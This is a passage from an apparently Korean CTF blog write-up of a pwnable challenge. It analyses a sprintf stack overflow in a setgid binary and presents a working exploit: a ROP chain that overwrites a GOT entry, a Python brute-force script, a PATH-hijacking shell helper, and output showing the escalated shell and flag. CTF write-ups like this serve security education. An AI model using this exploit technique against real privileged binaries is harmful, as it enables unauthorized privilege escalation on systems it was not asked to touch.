Category : Pwnables

NULL

Summary : simple buffer overflow on Ubuntu , got overwriting with sprintf


Server info
user20280@ubuntu:~$ uname -a
Linux ubuntu 2.6.38-11-generic #50-Ubuntu SMP Mon Sep 12 21:18:14 UTC 2011 i686 i686 i386 GNU/Linux

서버 환경은 Ubuntu 이지만 ASLR이 disable된상태이다.

주어진 파일은 flag user에 setgid가 걸린 bin1 뿐이다. Hex-Ray를 이용해 디컴파일하여 분석할 수 있다.

void main(int argc, char **argv)
{
  if ( argc == 2 )
  {
    puts(":)\n");
  }
  else
  {
    if ( argc == 1 )
      puts(":(\n");
  }
  vv(argv[1]);
  exit(0);
}

int vv(const char *name)
{
  int rand_var;
  char *env; 
  char buffer[512];
  unsigned int seed;

  if ( !name || strcmp("MOTR", name) )
  {
    seed = time(0);
    srand(seed);
    rand_var = rand() % 10;
    sprintf(&buffer, "%s\n", array[4 * rand_var]);
  }
  else
  {
    env = getenv(name);
    if ( !env )
      exit(1);
    sprintf(&buffer, "%s\n", env); // Vuln !!
  }
  return printf("%s", &buffer);
}

코드는 매우 간결하다. argv[1]에 "MOTR"이란 문자열을 넘겨주면 , "MOTR" 환경변수의 포인터를 받아와 sprintf를 이용해 지역변수에 출력을 저장한다.
하지만 env환경변수에는 지역변수의 크기를 넘는 데이터를 맘대로 넣을 수 있기때문에 overflow취약점이 발생한다.
sprintf함수를 수행하면서 입력글자뒤에 "\n"이 붙어버려서 , 페이로드에서 마지막글자에도 NULL을 넣어줄 수 없기때문에 Ascii armor가 enable되어있는 libc는 사용할 수 없다.

그래서 sprintf@plt를 이용해 특정함수의 got 에 system함수의 주소를 overwrite하고 마지막에 해당함수의 plt를 호출하는 페이로드를 구성하기로 했다. 
마침 , ASLR이 꺼져있기때문에 system함수의 주소에 해당하는 byte들을 메모리에서 찾을 필요없이 , 환경변수에 등록시켜두고 복사시키기로했다.

call   0x80483c8 <sprintf@plt> // snprintf@plt

(gdb) x/3i 0x08048502 // pop - pop - ret for call
   0x8048502 <__do_global_dtors_aux+82>: pop    %ebx
   0x8048503 <__do_global_dtors_aux+83>: pop    %ebp
   0x8048504 <__do_global_dtors_aux+84>: ret 

(gdb) p system // system@libc
$1 = {<text variable, no debug info>} 0x16f950 <system>

call   0x8048418 <printf@plt>
(gdb) disas 0x8048418
Dump of assembler code for function printf@plt:
   0x08048418 <+0>: jmp    *0x804a014 // printf@got
   0x0804841e <+6>: push   $0x28
   0x08048423 <+11>: jmp    0x80483b8

(gdb) x/s 0x80488eb
0x80488eb:  "MOTR" // argument for printf (it will finally be used to system("MOTR");)

system@libc 주소가 0x16f950 이다. 이를 환경변수에 등록시켜둔다.
user20280@ubuntu:~$ export PWN3R=`python -c 'print "\x50\xf9\x16"'`

그러므로 최종페이로드는 다음과 같다.

[sprintf@plt] + [ppr] + [printf@got] + [&env] + [printf@plt] + [aaaa] + [&"MOTR"]

system@libc 주소가 들어있는 환경변수의 주소를 정확히 구하기보단 파이썬 스크립트를 작성하여 브루트포싱하였다.

user20280@ubuntu:~$ cat MOTR.c
#include <stdio.h>

int main()
{
 setreuid(getuid(), geteuid());
 execl("/bin/sh" , "sh" , NULL);
}
user20280@ubuntu:~$ gcc -o MOTR MOTR.c
user20280@ubuntu:~$ export PATH=./:$PATH 

쉘을 실행하는 MOTR이라는 프로그램을 만들고 PATH 환경변수에 현재디렉토리를 최우선으로 설정한다.

exploit.py

#!/usr/bin/python

import os
import time

def pack(data):
 res = ""
 for i in range(0,4):
  res = res + chr(data % 0x100)
  data = data / 0x100
 return res

TARGET = "/home/user20280/bin1"

sprintf = 0x080483c8
ppr = 0x08048502
printf_got = 0x0804a014
printf_plt = 0x08048418
string = 0x80488eb

os.putenv("pwn","\x50\xf9\x16")

for env in range(0xbfffffff , 0xbfffe000 , -1):
 if "\x00" in pack(env):
  continue
 else:
  time.sleep(0.1)
  payload = "a"*532
  payload += pack(sprintf) + pack(ppr) + pack(printf_got) + pack(env)
  payload += pack(printf_plt) + "aaaa" + pack(string)
  os.putenv("MOTR" , payload)
  pid = os.fork()
  if pid == 0:
   os.execv(TARGET , ("pwn" , "MOTR"))
  else:
   os.waitpid(pid , 0)


user20280@ubuntu:~$ ./exploit.py
:)

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaȃ… ÿÿÿ„aaaa놄
..............................
..............................
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaȃ… 瀿¿„aaaa놄
:)

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaȃ… 怿¿„aaaa놄
:)

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaȃ… 倿¿„aaaa놄
$ id
uid=20280(user20280) gid=20280(user20280) egid=19999(flag) groups=20280(user20280)
$ cat key
key{Hack_the_planet_now}

Flag : Hack_the_planet_now

'CTF' 카테고리의 다른 글

2011 HUST Hacking Festival - K  (0) 2011.10.03
CSAW CTF Quals 2011 - bin3  (0) 2011.09.27
Defcon 19th CTF Quals - Retro Revisted 200  (0) 2011.09.25
Defcon 19th CTF Quals - Retro Revisted 300  (0) 2011.09.23
ISEC 2011 본선 CTF - board  (0) 2011.09.21

티스토리툴바